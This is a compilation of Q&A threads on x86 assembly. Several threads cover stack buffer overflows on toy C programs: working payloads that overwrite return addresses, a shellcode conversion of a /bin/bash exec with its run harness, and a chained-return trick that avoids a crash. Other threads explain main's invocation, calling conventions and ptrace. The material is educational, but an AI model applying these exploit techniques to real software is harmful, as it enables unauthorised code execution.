Buffer overflow appeared before it is expected - c

I'm trying to take control of a stack overflow. First, here is an example of C code I compiled on a 32-bit Linux VM (gcc -fno-stack-protector -ggdb -o first first.c):
#include "stdio.h"
int CanNeverExecute()
{
printf("I can never execute\n");
return(0);
}
void GetInput()
{
char buffer[8];
gets(buffer);
puts(buffer);
}
int main()
{
GetInput();
return(0);
}
Then debugger (intel flavor): dump of assembler code for function GetInput:
0x08048455 <+0>: push ebp
0x08048456 <+1>: mov ebp,esp
0x08048458 <+3>: sub esp,0x28
0x0804845b <+6>: lea eax,[ebp-0x10]
Here we can see that sub esp, 0x28 reserves 40 bytes for a buffer variable (Right?).
The CanNeverExecute function is located at address 0x0804843c.
So, in order to run the CanNeverExecute function, I need to put 40 bytes into the buffer variable, followed by 8 bytes for the stored base pointer and then the 8 bytes of the return pointer I want to change.
So, I need a string of 48 ASCII symbols plus \x3c\x84\x04\x08 at the end (the address of the CanNeverExecute function). That is the theory. But in practice I need only 20 bytes before the address of the return pointer:
~/hacktest $ printf "12345678901234567890\x3c\x84\x04\x08" | ./first
12345678901234567890..
I can never execute
Illegal instruction (core dumped)
Why does it need only 20 bytes instead of 48? Where is my mistake?

First off, your assembly is 32-bit. The saved EBP and the return address are 4 bytes each.
Second, the buffer variable does not start at the top of the stack (ESP) - it starts at ebp-0x10, which is 20 bytes away from the return address: 0x10 is 16 bytes, then 4 more for the saved EBP.

If you look at a bigger part of the disassembly you will see:
08048445 <GetInput>:
8048445: 55 push %ebp
8048446: 89 e5 mov %esp,%ebp
8048448: 83 ec 28 sub $0x28,%esp
804844b: 8d 45 f0 lea -0x10(%ebp),%eax
804844e: 89 04 24 mov %eax,(%esp)
8048451: e8 9a fe ff ff call 80482f0 <gets@plt>
8048456: 8d 45 f0 lea -0x10(%ebp),%eax
8048459: 89 04 24 mov %eax,(%esp)
804845c: e8 9f fe ff ff call 8048300 <puts@plt>
8048461: c9 leave
8048462: c3 ret
ebp is saved, esp is moved to ebp, then 40 is subtracted from esp (the stack frame, as you wrote),
but the pointer to buffer that is passed to gets is computed in the eax register, and eax is loaded with ebp-0x10!
lea -0x10(%ebp),%eax
So you need only 20 bytes before the return address (16 reserved + 4 for the stored base pointer on a 32-bit system).
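The arithmetic behind both answers can be sketched in C. The helper name and its parameters are illustrative assumptions and not part of the original program; the values 0x10 and 4 come from the lea instruction and from the size of the saved EBP on a 32-bit system.

```c
#include <stddef.h>

/* Hypothetical helper: number of filler bytes needed before the saved
 * return address. buffer_offset_below_ebp is the displacement seen in
 * the lea instruction (0x10 here); saved_frame_pointer_size is 4 on a
 * 32-bit system. */
size_t bytes_to_return_address(size_t buffer_offset_below_ebp,
                               size_t saved_frame_pointer_size)
{
    return buffer_offset_below_ebp + saved_frame_pointer_size;
}
```

Calling bytes_to_return_address(0x10, 4) gives the 20 filler bytes used in the working command line from the question.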

Related

How is main() called? Call to main() inside __libc_start_main()

I am trying to understand the call to main() inside __libc_start_main(). I know one of the parameters of __libc_start_main() is the address of main(). But, I am not able to figure out how is main() being called inside __libc_start_main() as there is no Opcode CALL or JMP. I see the following disassembly right before execution jumps to main().
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
I wrote a simple "Hello, World!!" in C. In the assembly above:
The execution jumps to main() right after instruction at address 0x7ffff7ded099.
Why is the MOV (to RAX) instruction causing a jump to main()?
Well, of course those instructions are not the ones that cause the call to main. I am not sure how you are stepping through those instructions, but if you are using GDB, you should use stepi instead of nexti.
I don't know why this happens precisely (some strange GDB or x86 quirk?) so I only speak from personal experience, but when reverse-engineering ELF binaries, I occasionally find that the nexti command executes several instructions before breaking. In your case, it misses a few movs before the actual call rax to call main().
What you can do to remediate this is to either use stepi, or to dump more code and then explicitly tell GDB to set breakpoints:
(gdb) x/20i
0x7ffff7ded08b <__libc_start_main+203>: lea rax,[rsp+0x20]
0x7ffff7ded090 <__libc_start_main+208>: mov QWORD PTR fs:0x300,rax
=> 0x7ffff7ded099 <__libc_start_main+217>: mov rax,QWORD PTR [rip+0x1c3e10] # 0x7ffff7fb0eb0
... more lines ...
... find call rax ...
(gdb) b *0x7ffff7dedXXX <= replace this
(gdb) continue
Here's what __libc_start_main() on my system does to call main():
21b6f: 48 8d 44 24 20 lea rax,[rsp+0x20] ; start preparing args
21b74: 64 48 89 04 25 00 03 mov QWORD PTR fs:0x300,rax
21b7b: 00 00
21b7d: 48 8b 05 24 93 3c 00 mov rax,QWORD PTR [rip+0x3c9324]
21b84: 48 8b 74 24 08 mov rsi,QWORD PTR [rsp+0x8]
21b89: 8b 7c 24 14 mov edi,DWORD PTR [rsp+0x14]
21b8d: 48 8b 10 mov rdx,QWORD PTR [rax]
21b90: 48 8b 44 24 18 mov rax,QWORD PTR [rsp+0x18] ; get address of main
21b95: ff d0 call rax ; actual call to main()
21b97: 89 c7 mov edi,eax
21b99: e8 32 16 02 00 call 431d0 <exit@@GLIBC_2.2.5> ; exit(result of main)
The first three instructions are the same that you show. At the moment of call rax, rax will contain the address of main. After calling main, the result is moved into edi (first argument) and exit(result) is called.
Looking at glibc's source code for __libc_start_main(), we can see that this is exactly what happens:
/* ... */
#ifdef HAVE_CLEANUP_JMP_BUF
int not_first_call;
not_first_call = setjmp ((struct __jmp_buf_tag *) unwind_buf.cancel_jmp_buf);
if (__glibc_likely (! not_first_call))
{
/* ... a bunch of stuff ... */
/* Run the program. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
}
else
{
/* ... a bunch of stuff ... */
}
#else
/* Nothing fancy, just call the function. */
result = main (argc, argv, __environ MAIN_AUXVEC_PARAM);
#endif
exit (result);
}
In my case I can see from the disassembly that HAVE_CLEANUP_JMP_BUF was defined when my glibc was compiled, so the actual call to main() is the one inside the if. I also suspect this is the case for your glibc.
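As a rough illustration of the pattern in the disassembly (load a function address, call through it, hand the result to exit), here is a minimal sketch in C. The names call_main_sketch and example_main are made up for this example, and the sketch returns the result instead of calling exit() so that it can be checked; it is not glibc's actual code.

```c
/* Signature of main as it is called in the glibc snippet above:
 * main (argc, argv, environment). */
typedef int (*main_fn_t)(int, char **, char **);

/* Hypothetical stand-in for the tail of __libc_start_main: call main
 * through a pointer (the "call rax") and hand back its result, which
 * the real function passes to exit(). */
int call_main_sketch(main_fn_t main_fn, int argc, char **argv, char **envp)
{
    int result = main_fn(argc, argv, envp);
    return result; /* the real code does exit(result) here */
}

/* Example entry point, for illustration only. */
int example_main(int argc, char **argv, char **envp)
{
    (void)argv;
    (void)envp;
    return argc + 40;
}
```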

How to convert an assembler program to shellcode correctly?

I wrote a program in nasm (x64) which should execute /bin/bash, and that works fine. Then I ran objdump -D on the program and wrote down the machine code like this: \xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05. Then I ran this with ./shell $(python -c 'print "\xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05"') and I got an illegal instruction. But the assembler program worked fine! Can someone help?
shell.c:
int main(int argc, char **argv) {
int (*func)();
func = (int (*)()) argv[1];
(int)(*func)();
}
bash.asm:
section .text
global start
start:
mov rbx, 0x68
push rbx
mov rbx, 0x7361622f6e69622f
push rbx
mov rdi, rsp
push rax
push rdi
mov rsi, rsp
mov al, 59
syscall
objdump:
./bash: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <start>:
401000: bb 68 00 00 00 mov $0x68,%ebx
401005: 53 push %rbx
401006: 48 bb 2f 62 69 6e 2f movabs $0x7361622f6e69622f,%rbx
40100d: 62 61 73
401010: 53 push %rbx
401011: 48 89 e7 mov %rsp,%rdi
401014: 50 push %rax
401015: 57 push %rdi
401016: 48 89 e6 mov %rsp,%rsi
401019: b0 3b mov $0x3b,%al
40101b: 0f 05 syscall
You are omitting the zero bytes here:
\xbb\x68\x53\x48\xbb\x2f\x62\x69\x6e\x2f\x62\x61\x73\x53\x48\x89\xe7\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05
as opposed to
401000: bb 68 00 00 00 mov $0x68,%ebx
The zero bytes are part of the instructions and cannot be skipped. So you have to include them.
The problem, however, is that the zero bytes would terminate the argument string and hence have to be avoided. It is your duty as the shellcode designer to construct it in such a way that it does not include byte values that may not occur. In many cases this means no zero bytes, because the shellcode is injected as a C string, but other values may be problematic in other situations, too.
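A quick way to see the problem is to scan the bytes for zeros before using them as a C string. The sketch below is only an illustration: the function name first_zero_byte and the array name bash_code are made up here, and the bytes are copied from the objdump listing above with the zeros included.

```c
#include <stddef.h>

/* Returns the index of the first zero byte in code, or len if there
 * is none. Anything after that index is lost when the bytes are
 * passed as a C string (for example through argv). */
size_t first_zero_byte(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (code[i] == 0)
            return i;
    }
    return len;
}

/* Machine code from the objdump listing, zero bytes included. */
static const unsigned char bash_code[] = {
    0xbb, 0x68, 0x00, 0x00, 0x00,             /* mov $0x68,%ebx */
    0x53,                                     /* push %rbx */
    0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f,
    0x62, 0x61, 0x73,                         /* movabs $0x7361622f6e69622f,%rbx */
    0x53,                                     /* push %rbx */
    0x48, 0x89, 0xe7,                         /* mov %rsp,%rdi */
    0x50,                                     /* push %rax */
    0x57,                                     /* push %rdi */
    0x48, 0x89, 0xe6,                         /* mov %rsp,%rsi */
    0xb0, 0x3b,                               /* mov $0x3b,%al */
    0x0f, 0x05                                /* syscall */
};
```

For this listing the first zero is at index 2, so only the first two bytes would survive as a command-line argument.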

Exploit a buffer overflow

For my studies I try to create a payload so that it overflows the buffer and calls a "secret" function called "target"
This is the code I use for testing on an i686
#include "stdio.h"
#include "string.h"
void target() {
printf("target\n");
}
void vulnerable(char* input) {
char buffer[16];
strcpy(buffer, input);
}
int main(int argc, char** argv) {
if(argc == 2)
vulnerable(argv[1]);
else
printf("Need an argument!");
return 0;
}
Task 1: Create a payload so that target() is being called.
This was rather easy to do by replacing the EIP with the address of the target function.
This is how the buffer looks
Buffer
(gdb) x/8x buffer
0xbfffef50: 0x41414141 0x41414141 0x00414141 0x08048532
0xbfffef60: 0x00000002 0xbffff024 0xbfffef88 0x080484ca
Payload I used was:
run AAAAAAAAAAAAAAAAAAAAAAAAAAAA$'\x7d\x84\x04\x08'
This works fine but stops with a segmentation fault.
Task 2: Modify the payload in a way that it does not give a segmentation fault
This is where I am stuck. Obviously it causes a segmentation fault because we do not call target with the call instruction and therefore there is no valid return address.
I tried to add the return address on the stack but that did not help
run AAAAAAAAAAAAAAAAAAAAAAAA$'\xca\x84\x04\x08'$'\x7d\x84\x04\x08'
Maybe someone can help me out with this. Probably I also have to add the saved EBP of main?
I attach the objdump of the program
0804847d <target>:
804847d: 55 push %ebp
804847e: 89 e5 mov %esp,%ebp
8048480: 83 ec 18 sub $0x18,%esp
8048483: c7 04 24 70 85 04 08 movl $0x8048570,(%esp)
804848a: e8 c1 fe ff ff call 8048350 <puts@plt>
804848f: c9 leave
8048490: c3 ret
08048491 <vulnerable>:
8048491: 55 push %ebp
8048492: 89 e5 mov %esp,%ebp
8048494: 83 ec 28 sub $0x28,%esp
8048497: 8b 45 08 mov 0x8(%ebp),%eax
804849a: 89 44 24 04 mov %eax,0x4(%esp)
804849e: 8d 45 e8 lea -0x18(%ebp),%eax
80484a1: 89 04 24 mov %eax,(%esp)
80484a4: e8 97 fe ff ff call 8048340 <strcpy@plt>
80484a9: c9 leave
80484aa: c3 ret
080484ab <main>:
80484ab: 55 push %ebp
80484ac: 89 e5 mov %esp,%ebp
80484ae: 83 e4 f0 and $0xfffffff0,%esp
80484b1: 83 ec 10 sub $0x10,%esp
80484b4: 83 7d 08 02 cmpl $0x2,0x8(%ebp)
80484b8: 75 12 jne 80484cc <main+0x21>
80484ba: 8b 45 0c mov 0xc(%ebp),%eax
80484bd: 83 c0 04 add $0x4,%eax
80484c0: 8b 00 mov (%eax),%eax
80484c2: 89 04 24 mov %eax,(%esp)
80484c5: e8 c7 ff ff ff call 8048491 <vulnerable>
80484ca: eb 0c jmp 80484d8 <main+0x2d>
80484cc: c7 04 24 77 85 04 08 movl $0x8048577,(%esp)
80484d3: e8 58 fe ff ff call 8048330 <printf@plt>
80484d8: b8 00 00 00 00 mov $0x0,%eax
80484dd: c9 leave
80484de: c3 ret
80484df: 90 nop
You need enough data to fill the stack space reserved for 'buffer', then more to overwrite the saved stack frame pointer, then the address of target() to overwrite the return address, and then one more address within target(), not at the very beginning of the function but just past the push, so that the old stack frame pointer is not pushed on the stack again. That causes vulnerable() to run target() instead of returning properly, and then target() runs a second time, so that you return from target() using main()'s stack and exit without a segmentation fault.
When we enter vulnerable() for the first time and are about to put data
into the 'buffer' variable the stack looks like this:
-----------
| 24-bytes of local storage - 'buffer' lives here
-----------
| old stack frame pointer (from main) <-- EBP points here
-----------
| old EIP (address in main)
-----------
| 'input' argument for 'vulnerable'
-----------
| top of stack for main
-----------
| ... more stack here ...
So starting at the address of 'buffer' we need to put in 24-bytes of junk to
get past the local storage reserved on the stack, then 4-more bytes to get
past the old stack frame pointer stored on the stack, then we are at the
location where the old EIP is stored. That's the instruction pointer that the CPU follows blindly. We like him. He's going to help us crush this program. We overwrite the value of the old EIP in the stack which currently points to an address in main() with the start address of target() which is found via the gdb
disassemble command:
(gdb) disas target
Dump of assembler code for function target:
0x08048424 <+0>: push %ebp
0x08048425 <+1>: mov %esp,%ebp
0x08048427 <+3>: sub $0x18,%esp
0x0804842a <+6>: movl $0x8048554,(%esp)
0x08048431 <+13>: call 0x8048354 <puts@plt>
0x08048436 <+18>: leave
0x08048437 <+19>: ret
End of assembler dump.
The address of the target() function is 0x08048424. Since the system (mine, at least) is little-endian, we enter the bytes least significant first: \x24, \x84, \x04, and \x08.
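The byte ordering can be sketched in C as follows. The function name pack_le32 is an assumption made for this example; it simply writes a 32-bit value least significant byte first, which is the order the bytes must appear in on the command line.

```c
#include <stdint.h>

/* Writes value into out in little-endian order: least significant
 * byte first, most significant byte last. */
void pack_le32(uint32_t value, unsigned char out[4])
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

For 0x08048424 this yields the bytes 0x24, 0x84, 0x04, 0x08, in that order.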
But that leaves us with a problem because as vulnerable() returns it pops all
the junk that we put in the stack off the stack and we are left with a stack
that looks like this when we are just about to process in target() for the
first time:
-----------
| 'input' argument for 'vulnerable'
-----------
| top of stack for main
-----------
| ... more stack here ...
So when target() wants to return it will not find the return address on the
top of its stack as expected and so will have a segmentation fault.
So we want to force a new return value onto the top of the stack before we
start processing in target(). But what value to choose? We don't want to push
the EBP because it contains garbage. Remember? We shoved garbage into it when we overwrote 'buffer'. So instead we push the address of the target() instruction just after the
push %ebp
(in this case address 0x08048425).
This means that the stack will look like this when target() is ready to return
for the first time:
-----------
| address of mov %esp, %ebp instruction in target()
-----------
| top of stack for main
-----------
| ... more stack here ...
So upon return from target() the first time, the EIP will point at the second instruction in target(), which means that the second time we run through target() it has the same stack that main() had when it ran. The top of the stack is the same as the top of the stack for main(). Now the stack looks like:
-----------
| top of stack for main
-----------
| ... more stack here ...
So when target() returns the second time it has a good stack to return with
since it is using the same stack that main() used and so the program exits normally.
So to sum it up that is 28-bytes followed by the address of the first instruction in target() followed by the address of the second instruction in target().
sys1:/usr2/home> ./buggy AAAAAAAAAABBBBBBBBBBCCCCCCCC$'\x24\x84\x04\x08'$'\x25\x84\x04\x08'
target
target
sys1:/usr2/home>
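The layout of that payload can be written down as a C struct to double-check the offsets. This is only a sketch: the struct and field names are made up for illustration, and the 24 comes from the lea -0x18(%ebp),%eax instruction in vulnerable().

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical view of the bytes written by strcpy(), starting at the
 * address of 'buffer' and growing toward higher addresses. */
struct overflow_layout {
    unsigned char local_storage[24]; /* junk: up to the saved EBP */
    uint32_t saved_ebp;              /* junk: old stack frame pointer */
    uint32_t return_addr;            /* first instruction of target() */
    uint32_t second_return;          /* second instruction of target();
                                        lands in the slot that held the
                                        'input' argument */
};

/* Number of junk bytes that precede the first address. */
size_t filler_length(void)
{
    return offsetof(struct overflow_layout, return_addr);
}
```

filler_length() comes out as 28, matching the 28 filler characters in the command line above.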

Try to understand calling process in assembly code

I wrote a very simple program in C and try to understand the function calling process.
#include "stdio.h"
void Oh(unsigned x) {
printf("%u\n", x);
}
int main(int argc, char const *argv[])
{
Oh(0x67611c8c);
return 0;
}
And its assembly code seems to be
0000000100000f20 <_Oh>:
100000f20: 55 push %rbp
100000f21: 48 89 e5 mov %rsp,%rbp
100000f24: 48 83 ec 10 sub $0x10,%rsp
100000f28: 48 8d 05 6b 00 00 00 lea 0x6b(%rip),%rax # 100000f9a <_printf$stub+0x20>
100000f2f: 89 7d fc mov %edi,-0x4(%rbp)
100000f32: 8b 75 fc mov -0x4(%rbp),%esi
100000f35: 48 89 c7 mov %rax,%rdi
100000f38: b0 00 mov $0x0,%al
100000f3a: e8 3b 00 00 00 callq 100000f7a <_printf$stub>
100000f3f: 89 45 f8 mov %eax,-0x8(%rbp)
100000f42: 48 83 c4 10 add $0x10,%rsp
100000f46: 5d pop %rbp
100000f47: c3 retq
100000f48: 0f 1f 84 00 00 00 00 nopl 0x0(%rax,%rax,1)
100000f4f: 00
0000000100000f50 <_main>:
100000f50: 55 push %rbp
100000f51: 48 89 e5 mov %rsp,%rbp
100000f54: 48 83 ec 10 sub $0x10,%rsp
100000f58: b8 8c 1c 61 67 mov $0x67611c8c,%eax
100000f5d: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
100000f64: 89 7d f8 mov %edi,-0x8(%rbp)
100000f67: 48 89 75 f0 mov %rsi,-0x10(%rbp)
100000f6b: 89 c7 mov %eax,%edi
100000f6d: e8 ae ff ff ff callq 100000f20 <_Oh>
100000f72: 31 c0 xor %eax,%eax
100000f74: 48 83 c4 10 add $0x10,%rsp
100000f78: 5d pop %rbp
100000f79: c3 retq
Well, I don't quite understand the argument passing process. Since there is only one parameter passed to the Oh function, I can understand this:
100000f58: b8 8c 1c 61 67 mov $0x67611c8c,%eax
So what does the code below do? Why rbp? Isn't it abandoned in x86-64 assembly? If it is x86-style assembly, how can I generate x86-64-style assembly using clang? If it is x86, it doesn't matter; could anyone explain the code below line by line for me?
100000f5d: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%rbp)
100000f64: 89 7d f8 mov %edi,-0x8(%rbp)
100000f67: 48 89 75 f0 mov %rsi,-0x10(%rbp)
100000f6b: 89 c7 mov %eax,%edi
100000f6d: e8 ae ff ff ff callq 100000f20 <_Oh>
You might get cleaner code if you turned optimizations on, or you might not. But, here’s what that does.
The %rbp register is being used as a frame pointer, that is, a pointer to the original top of the stack. It’s saved on the stack, stored, and restored at the end. Far from being removed in x86_64, it was added there; the 32-bit equivalent was %ebp.
After this value is saved, the program allocates sixteen bytes off the stack by subtracting from the stack pointer.
There is then a very inefficient series of copies that sets the first argument of Oh() as the second argument of printf() and the constant address of the format string (relative to the instruction pointer) as the first argument of printf(). Remember that, in this calling convention, the first argument is passed in %rdi (or %edi for 32-bit operands) and the second in %rsi. This could have been simplified to two instructions.
After calling printf(), the program (needlessly) saves the return value on the stack, restores the stack and frame pointers, and returns.
In main(), there’s similar code to set up the stack frame, then the program saves argc and argv (needlessly), then it moves around the constant argument to Oh into its first argument, by way of %eax. This could have been optimized into a single instruction. It then calls Oh(). On return, it sets its return value to 0, cleans up the stack, and returns.
The code you’re asking about does the following: stores the constant 32-bit value 0 on the stack, saves the 32-bit value argc on the stack, saves the 64-bit pointer argv on the stack (the first and second arguments to main()), and sets the first argument of the function it is about to call to %eax, which it had previously loaded with a constant. This is all unnecessary for this program, but would have been necessary had it needed to use argc and argv after the call, when those registers would have been clobbered. There’s no good reason it used two steps to load the constant instead of one.
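To make the last point concrete, here is a variant in which saving argc is not wasted work. It is a hedged sketch: main_variant is a made-up name (so that it does not clash with a real main), and how a particular compiler chooses to preserve argc is not something this example can show.

```c
#include <stdio.h>

void Oh(unsigned x) {
    printf("%u\n", x);
}

/* Variant of main's body in which argc is read after the call.
 * %edi is reused to pass the argument to Oh(), so the incoming argc
 * has to be kept somewhere else (for example on the stack) until the
 * call returns. */
int main_variant(int argc, char const *argv[])
{
    (void)argv;
    Oh(0x67611c8c);
    return argc;
}
```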
As Jester mentions, you still have frame pointers on (to aid debugging), so stepping through main:
0000000100000f50 <_main>:
First we enter a new stack frame, we have to save the base pointer and move the stack to the new base. Also, in x86_64 the stack frame has to be aligned to a 16 byte boundary (hence moving the stack pointer by 0x10).
100000f50: push %rbp
100000f51: mov %rsp,%rbp
100000f54: sub $0x10,%rsp
As you mention, x86_64 passes parameters by register, so load the param in to the register:
100000f58: mov $0x67611c8c,%eax
??? Help needed
100000f5d: movl $0x0,-0x4(%rbp)
From here: "Registers RBP, RBX, and R12-R15 are callee-save registers", so if we want to save other registers then we have to do it ourselves ....
100000f64: mov %edi,-0x8(%rbp)
100000f67: mov %rsi,-0x10(%rbp)
Not really sure why we didn't just load this in %edi where it needs to be for the call to begin with, but we better move it there now.
100000f6b: mov %eax,%edi
Call the function:
100000f6d: callq 100000f20 <_Oh>
This is the return value (passed in %eax); xor is a smaller instruction than loading 0, so it is a common optimization:
100000f72: xor %eax,%eax
Clean up that stack frame we added earlier (not really sure why we saved those registers on it when we didn't use them)
100000f74: add $0x10,%rsp
100000f78: pop %rbp
100000f79: retq

Detect call's offset with ptrace

I'm trying to write a program that can detect calls using ptrace.
Using PTRACE_SINGLESTEP I can run a program instruction by instruction; then, when the byte pointed to by the RIP register is the opcode 0xe8, I use PTRACE_PEEKTEXT to get the next 4 bytes after the address pointed to by RIP.
Then, according to the documentation I found on the internet, those 4 bytes contain an offset referring to the location to jump to.
It seems like PTRACE_PEEKTEXT is returning some weird values, and I get offsets that are too big.
Here my code below:
instr_num = ptrace(PTRACE_PEEKTEXT, this->pid, regs.rip, 0);
dest = ptrace(PTRACE_PEEKTEXT, this->pid, regs.rip + 1, 0);
if (instr_num == 0xe8)
{
printf("call : %ld\n", regs.rip + dest);
}
And here's the output:
call : -2853719444197214464
call : -2853719444197214464
call : -2853719444197214464
And this is the objdump -D output, and as you can see there is 15 bytes of offset between the call from the main and the beginning of the function func:
00000000004004c4 <func>:
4004c4: 55 push %rbp
4004c5: 48 89 e5 mov %rsp,%rbp
4004c8: 5d pop %rbp
4004c9: c3 retq
00000000004004ca <main>:
4004ca: 55 push %rbp
4004cb: 48 89 e5 mov %rsp,%rbp
4004ce: b8 00 00 00 00 mov $0x0,%eax
4004d3: e8 ec ff ff ff callq 4004c4 <func>
4004d8: 5d pop %rbp
4004d9: c3 retq
If, just after I detect a call, I do a ptrace(PTRACE_SINGLESTEP) once, will my RIP contain the address of the function I just jumped to? According to my tests it seems not to, but I think it should.
Try:
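printf("call : 0x%lx\n", regs.rip + 5 + (long) (int) (dest & (unsigned long) UINT_MAX));
dest is a 64-bit value, but the offset is encoded here in 32 bits, so it has to be truncated and sign-extended. The offset is relative to the address of the next instruction, hence the + 5 (the length of the call instruction). Note also that instr_num holds a full word, so compare only its low byte: (instr_num & 0xff) == 0xe8. Printing in hex is much nicer for this kind of code.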
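The decoding can also be done from a single PTRACE_PEEKTEXT word read at RIP. The following is a minimal sketch under a few assumptions: the function name decode_call_rel32 is made up, the word is passed in as a plain integer so the logic can be checked without a traced process, and the host is little-endian (as x86-64 is).

```c
#include <stdint.h>

/* Decodes a near call (opcode 0xe8 followed by a 32-bit displacement)
 * from the 8-byte word read at rip. Returns 1 and stores the call
 * target in *target if the word starts with 0xe8, otherwise returns 0.
 * The displacement is relative to the next instruction, which starts
 * 5 bytes after rip. */
int decode_call_rel32(uint64_t rip, uint64_t word_at_rip, uint64_t *target)
{
    if ((word_at_rip & 0xff) != 0xe8)
        return 0;

    /* Bytes 1..4 of the word hold the signed displacement. */
    int32_t rel = (int32_t)(uint32_t)(word_at_rip >> 8);

    *target = rip + 5 + (uint64_t)(int64_t)rel;
    return 1;
}
```

With the bytes from the objdump output above (e8 ec ff ff ff at 0x4004d3), the displacement is -20 and the target is 0x4004c4, the start of func.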

Resources